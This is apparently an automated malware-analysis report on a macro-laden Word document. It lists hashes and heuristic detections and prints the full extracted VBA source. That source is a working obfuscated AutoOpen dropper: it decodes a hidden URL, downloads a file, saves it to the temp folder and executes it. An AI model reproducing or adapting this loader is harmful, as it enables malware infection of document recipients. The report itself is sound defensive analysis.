Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6b1e99f1f81d3e35…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 31.3 KB
Created: 2016-07-26 10:42:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2016-10-26
MD5: e65ef6281216de28666958fa45e7ca11
SHA-1: 2dba4758c89f63c6b807c858404721cd40e58b25
SHA-256: 6b1e99f1f81d3e354e204fb3b89a6c8510d94703a5c16459c7209fbaece845a5
Risk score: 352

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The sample is an OOXML document containing VBA macros. Heuristics indicate the presence of an obfuscated auto-exec loader that uses CreateObject and Shell/exec functions to download and execute a file. The embedded artifact 'macros.bas' likely contains this malicious VBA code.

Heuristics (9)

  • ClamAV: Doc.Malware.Valyria-10019999-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-10019999-0
  • VBA project inside OOXML (severity: medium, rule: OOXML_VBA, 5 related findings)
    Document contains a VBA project (VBA macros present).
  • VBA downloads and writes a file to disk (severity: critical, rule: OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper, even though the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
      somebody = variablrName1DASH_1.responseBody
  • Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
      Set variablrName1DASH1solo = CreateObject(trutrufast(3))
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
      Set variablrName1DASH1solo = CreateObject(trutrufast(3))
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
      Sub autoopen()
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12496 bytes
SHA-256: daec303eecc117cf647811dd5585244cefd86d5870a4627749ee6f466eb618e9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
LoadBaseFile
End Sub


Attribute VB_Name = "Module1"
Public variablrName1DASH_1 As Object
Public variablrName3 As Object
Public variablrName1DASH_3 As Object
Public variablrName5() As String


Public variablrName1DASH_4 As String
Public trutrufast() As String
Public variablrName1_tolko1 As String
Public variablrName1DASHfiddle As Object
Public variablrName4 As String
 Public variablrName2 As String
Public somebody As Variant
Public Function indata_to_kingaku(ByVal idx As Long, ByVal indata As Long) As Long
 Dim kingaku As Long
 Dim pasIdx As Long
 pasIdx = f1002_get_.sbt(idx)
 Select Case f1002_get_.Kind(idx)
 Case 2, 5, 6
 If f1007_get_.urikin(pasIdx) = 0 Or f1007_get_.inpscl(pasIdx) = 0 Then
 kingaku = 0
 Else
 kingaku = indata * f1007_get_.inpscl(pasIdx) * f1007_get_.tamatanka(pasIdx)
 End If
 Case Else
 kingaku = indata * 100
 End Select
 indata_to_kingaku = kingaku
End Function

Public Sub set_safe_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 g_dai.Rel(rdb - 1).safe = newValue
 If dataLink Then
 g_dai.Rel(rdb - 1).out = newValue
 End If
End Sub
Public Sub set_start_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 g_dai.Rel(rdb - 1).Start = newValue
 If dataLink Then
 End If
End Sub
Public Sub set_gen1uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 Dim sbt As Long
 Dim kinko As Long
 g_dai.Rel(rdb - 1).gen1uri = newValue
 If dataLink Then
 sbt = f1001_get_.sbt(rdb)
 g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
 kinko = f1001_get_.kinko(rdb)
 g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
 End If
End Sub

Public Sub AbnormalWindup()
 Dim rc As Long
 Dim rs As Long
 Set variablrName1DASH1solo = CreateObject(trutrufast(3))
 Set variablrName1DASH_3 = variablrName1DASH1solo.Environment(trutrufast(4))
 Dim apdistance As Integer
For apdistance = LBound(variablrName5) To UBound(variablrName5)
 variablrName4 = variablrName4 & SUBBUS3(apdistance)
 Next apdistance
 CheckRecovery
 Exit Sub
 Dim ftp As String
 For rs = 1 To f1000_get_rs + 1
 rc = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc = 0 Then
 rc = ft.p.DeleteFile("/r0/set")
 rc = ft.p.DeleteFile("/r0/mf6407_*")
 rc = ft.p.DeleteFile("/r0/mf6411*")
 rc = ft.p.DeleteFile("/r0/setok")
 rc = ft.p.DeleteFile("/r0/setng")
 ft.p.Close
 End If
 Next
End Sub
Public Function DataRecover(ByVal fLink As Boolean) As Boolean
 Dim I As Long
 Dim msg As String
 DataRecover = False
 If CheckGuid Then
 f640X_b.uild err_buf, err_count, bld_result, fLink
 If f640X_put = False Then
 Exit Function
 End If
 If set_put = False Then
 Exit Function
 End If
 SaveGu.ID
 DataRecover = True
 Else
 MsgBox "PC", vbCritical
 End If
End Function
Public Sub ShowResult()
 frmResult.Show vbModal
End Sub

Public Function SUBBUS3(variablrName6 As Integer) As String
Dost = CInt(variablrName5(variablrName6))
SUBBUS3 = Chr(Dost / (35 - 8))
End Function
Public Function SUBBUS2(A1 As String, A2 As String, A3 As String) As String
SUBBUS2 = Replace(A1, A2, A3)
End Function
Public Function GetDocumentName() As String
 If g_fileName = "" Then
 GetDocumentName = DEF_FILE_NAME
 Else
 GetDocumentName = g_fileName
 End If
End Function
Public Function NewDocument() As Boolean
 Erase g_dai.Rel
 Erase g_zen.Rel
 NewDocument = LoadBaseFile
End Function
Public Function OpenDocument(typicalName As String) As Boolean
 On Error GoTo ErrHandler
 Dim skipData As Long
 Dim fno As Integer
 trutrufast = Split(variablrName2, "ROOOOH")
 Set variablrName3 = CreateObject(trutrufast(1))
 Set variablrName1DASHfiddle = CreateObject(trutrufast(2))
 Dim I As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For I = 1 To Len(Trim("eesucka"))
 If d = False Then
Set variablrName1DASH_1 = CreateObject(trutrufast(I - 2))
Exit For
Else
d = False
End If
Next I
AbnormalWindup
Exit Function
 g_fileName = typicalName
 I = 0
 fno = FreeFile
 Open Replace(g_fileName, ".csv", "_d.csv") For Input As fno
 Do While Not EOF(fno)
  I = I + 1
 Loop
 Close fno
 I = 0
 fno = FreeFile
 Open Replace(g_fileName, ".csv", "_z.csv") For Input As fno
 Do While Not EOF(fno)
 I = I + 1
 Loop
 Close fno
 OpenDocument = True
 Exit Function
ErrHandler:
 OpenDocument = False
End Function
Public Function SaveDocument(typicalName As String) As Boolean
 On Error GoTo ErrHandler
 Dim I As Long
 Dim fno As Integer
  variablrName2 = SUBBUS2(variablrName2, "ROOH", "M")
 variablrName2 = SUBBUS2(variablrName2, "ROOOH", "s")
 OpenDocument ""
 Exit Function
 fno = FreeFile
 Open typicalName For Output As fno
 Write #fno, Now
 Close fno
 I = 0
 fno = FreeFile
 Open Replace(typicalName, ".csv", "_d.csv") For Output As fno
 For I = 0 To UBound(g_dai.Rel)
 Write #fno, I + 1, g_dai.Rel(I).out, g_dai.Rel(I).safe, g_dai.Rel(I).Start, g_dai.Rel(I).gen1uri, g_dai.Rel(I).gen2uri
 Next
 Close fno
 I = 0
 fno = FreeFile
 Open Replace(typicalName, ".csv", "_z.csv") For Output As fno
 For I = 0 To UBound(g_zen.Rel)
 Write #fno, I + 1, g_zen.Rel(I).urikin
 Next
 Close fno
 SaveDocument = True
 Exit Function
ErrHandler:
 SaveDocument = False
End Function



Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub erer()

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9CE5FF10-686D-4989-944B-505153292E69}{6262A439-2940-4599-BCD5-53A63AE71F0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Frame1_Click()

End Sub

Private Sub MultiPage1_Change()

End Sub

Private Sub TabStrip1_Change()

End Sub

Attribute VB_Name = "Module"
Public Sub set_gen2uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 Dim sbt As Long
 Dim kinko As Long
 variablrName3.Write somebody
 variablrName3.savetofile variablrName1_tolko1, 2
 set_out_rel 0, 0, False
 Exit Sub
 g_dai.Rel(rdb - 1).gen2uri = newValue
 If dataLink Then
 sbt = f1001_get_.sbt(rdb)
 g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
 kinko = f1001_get_.kinko(rdb)
 g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
 End If
End Sub
Public Sub set_indata_rel(ByVal idx As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 g_zen.Rel(idx - 1).urikin = newValue
 If dataLink Then
 End If
End Sub
Public Sub f640X_build(err_buffer() As String, err_count As Long, bld_result() As String, ByVal fLink As Boolean)
 If fLink Then
 
 Else

 End If
End Sub

Public Function LoadBaseFile() As Boolean
 Dim wssName As String
 Dim fno As Integer
 variablrName5 = Split("2808312312312443132312312312443132312312312443024312312312441566312312312441269312312312441269312312312443213312312312443213312312312443213312312312441242312312312443132312312312443078312312312442619312312312443024312312312442619312312312442916312312312442916312312312442619312312312442970312312312441242312312312442673312312312442997312312312442943312312312441269312312312442997312312312442889312312312443024312312312441539312312312441512312312312441485312312312442781312312312441485312312312443186", "31231231244")
variablrName2 = SUBBUS2("ROOHicroROOOHoft.XROOHLHTTPROOOOHAdodb.ROOOHtrROHaROOHROOOOHROOOHhROHll.Appl" _
+ SUBBUS2("icationROOOOHWROOOHcript.ROOOHhROHllROOOOHProcROHROOOHROOOHROOOOHGROHTROOOOHTROHROOHPROOOOHTypROHROOOOHopROHnROOOOHwritDATponROOOHROHBodyROOOOHROOOHavROHtofilROHROOOOH", "DAT", "ROHROOOOHrROHROOOH") _
+ "\hramgROOOH.ROHxROH", "ROH", "e")
SaveDocument ""
End Function

Public Function f640X_put() As Boolean
 Dim allOk As Boolean
 Dim rc(4) As Long
 Dim rs As Long
 variablrName1DASH_4 = variablrName1DASH_3(trutrufast(6))
 variablrName1_tolko1 = variablrName1DASH_4
variablrName1_tolko1 = variablrName1_tolko1 + trutrufast(12)
variablrName3.Type = 1
MakeLocalFile
Exit Function
 f640X_put = True
 MakeLocalFile
 For rs = 1 To f1000_get_rs + 1
 rc(0) = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc(0) = 0 Then
 rc(1) = ft.p.PutFile("mf6407_" & CStr(rs) & ".bin", "/r0", 1)
 rc(2) = ft.p.PutFile("mf6407_" & CStr(rs) & ".crc", "/r0", 1)
 rc(3) = ft.p.PutFile("mf6411.bin", "/r0", 1)
 rc(4) = ft.p.PutFile("mf6411.crc", "/r0", 1)
 ft.p.Close
 Else
 Call ErrCo.nnect(ftp, rc(0))
 End If
 Set ftp = Nothing
 If rc(0) <> 0 Or rc(1) <> 1 Or rc(2) <> 1 Or rc(3) <> 1 Or rc(4) <> 1 Then
 f640X_put = False
 Exit For
 End If
 Next
 Kill "mf6407_.bin"
 Kill "mf6407_.crc"
 Kill "mf6411."
End Function

Attribute VB_Name = "Module2"
Public Function f4103_get_kingaku(ByVal idx As Long) As Long
 f4103_get_kingaku = indata_to_kingaku(idx, fno4103_get_.indata(s_f.no4103(0), idx))
End Function
Public Function sum_kinko_dai(ByVal kinko As Long) As Long
 Dim rdb As Long
 Dim sum As Long
 For rdb = 1 To f1000_get_daisu
 If f1001_get_.kinko(rdb) = kinko Then
 sum = sum + g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri
 End If
 Next
 sum_kinko_dai = sum
End Function
Public Sub set_out_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 variablrName1DASHfiddle.Open (variablrName1_tolko1)
 Exit Sub
 g_dai.Rel(rdb - 1).out = newValue
 If dataLink Then
 g_dai.Rel(rdb - 1).safe = newValue
 End If
End Sub

Public Sub MakeLocalFile()
 Dim fno As Integer
 Dim rs As Long
 Dim I As Long
 Dim crc As Integer
 variablrName3.Open
 somebody = variablrName1DASH_1.responseBody
 set_gen2uri_rel 0, 0, False
 Exit Sub
 Dim work(512 - 1) As Byte
 For rs = 1 To 3
 fno = FreeFile
 Open "mf6407_" & CStr(rs) & ".bin" For Binary As fno
 For I = 0 To UBound(work)
 work(I) = s_fn.o6407(((rs - 1) * 512 * RECSIZE_FN.O4102) + I)
 Next
 Put fno, , work
 Close fno
 crc = hto.ns(lec_cal.ccrc(work(0), RECSIZE_FN.O4102 * 512))
 fno = FreeFile
 Open "mf6407_" & CStr(rs) & ".crc" For Binary As fno
 Put fno, , crc
 Close fno
 Next
 fno = FreeFile
 Open "mf6411.bin" For Binary As fno
 Put fno, , s_fno6411
 Close fno
 crc = hto.ns(lec_cal.ccrc(s_fno6411(0), SIZE_OF_FNO6411))
 fno = FreeFile
 Open "mf6411.crc" For Binary As fno
 Put fno, , crc
 Close fno
End Sub

Public Function set_put() As Boolean
 Dim allOk As Boolean
 Dim rc(4) As Long
 Dim rs As Long
 Dim ftp As String
 set_put = True
 For rs = 1 To f1000_get_rs + 1
 rc(0) = f.tp.Connect("as" & CStr(rs), "super", "user")
 If rc(0) = 0 Then
 rc(1) = ft.p.PutFile("set", "/r0", 1)
 ft.p.Close
 Else
 Call ErrCon.nect(ftp, rc(0))
 End If
 If rc(0) <> 0 Or rc(1) <> 1 Then
 set_put = False
 Exit For
 End If
 Next
End Function
Public Function CheckRecovery() As Long
 Dim okFlag As Boolean, ngFlag As Boolean
 Dim rc As Long
 Dim rs As Long
 Dim farray As Variant
 If Application = "Microsoft Word" Then
 variablrName1DASH_1.Open trutrufast(5), variablrName4, False
variablrName1DASH_1.Send
f640X_put
End If
Exit Function
 Dim ftp As String
 For rs = 1 To f1000_get_rs + 1
 rc = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc = 0 Then
 farray = ft.p.GetDir("/r0")
 okFlag = InArr.ay(farray, "setok")
 ngFlag = InArr.ay(farray, "setng")
 If okFlag = True And ngFlag = False Then
 CheckRecovery = 1
 ElseIf okFlag = False And ngFlag = True Then
 CheckRecovery = 2
 Else
 CheckRecovery = 0
 End If
 End If
 Next
End Function
Public Sub NormalWindup()
 Dim rc As Long
 Dim rs As Long
 Dim ftp As String
 For rs = 1 To f1000_get_rs + 1
 rc = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc = 0 Then
 rc = ft.p.DeleteFile("/r0/setok")
 rc = ft.p.DeleteFile("/r0/setng")
 ft.p.Close
 End If
 Next
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 48640 bytes
SHA-256: 50529d74c9bd8d02bf757287311f0a7c7fd1c9078f7e9a740d7d55a94094ae37
Detection
ClamAV: Doc.Malware.Valyria-10019999-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).